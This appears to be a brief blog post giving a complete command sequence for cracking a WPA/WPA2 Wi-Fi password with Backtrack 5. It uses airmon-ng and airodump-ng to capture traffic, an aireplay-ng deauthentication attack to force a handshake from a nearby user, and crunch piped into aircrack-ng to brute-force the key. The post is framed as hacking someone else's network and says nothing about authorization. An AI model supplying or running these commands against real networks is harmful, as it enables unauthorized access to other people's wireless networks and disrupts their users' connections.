Hacking WPA/WPA2 using Backtrack 5/aircrack-ng/crunch

If you're like me, you've probably wanted a short and quick way to hack a wifi without reading a whole lot of instructions or watching some crap or blurry videos. So, here's my way of hacking a wifi.

Requirements:

  • Backtrack 5
  • NEARBY WPA/WPA2 secured wireless access point (IMPORANT!)
  • Another guy NEARBY using the same wifi

Steps:

  1. Open up the terminal in Backtrack
  2. Type: 
    • airmon-ng
  3. Choose your wireless card. eg. wlan0
  4. Type:
    • airmon-ng start wlan0
  5. Type:
    • airodump-ng mon0
  6. Note down the MAC address of the access point eg. 01:23:45:67:89:ab
  7. Note down the MAC address of one of the clients eg. 23:45:67:89:ab:01
  8. Note down the channel of the client eg. 11
  9. Type:
    • airodump-ng -w capturefile --bssid 01:23:45:67:89:ab -c 11 mon0
  10. Open up a new terminal
  11. Type:
    • aireplay-ng --deauth 1 -a 01:23:45:67:89:ab -c 23:45:67:89:ab:01 mon0
  12. Wait until WPA handshake is shown on the other (airodump-ng) window
  13. Type:
    • crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng --bssid 01:23:45:67:89:ab -w- capturefile-01.cap
Notes: (if you failed)
  • increase the number '8' . eg.
    • crunch 8 10 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng --bssid 01:23:45:67:89:ab -w- capturefile-01.cap
  •  change the charset. eg. 
    • crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%&*()-_+={[}];:"',<.>?/|\. | aircrack-ng --bssid 01:23:45:67:89:ab -w- capturefile-01.cap


Post a Comment

0 Comments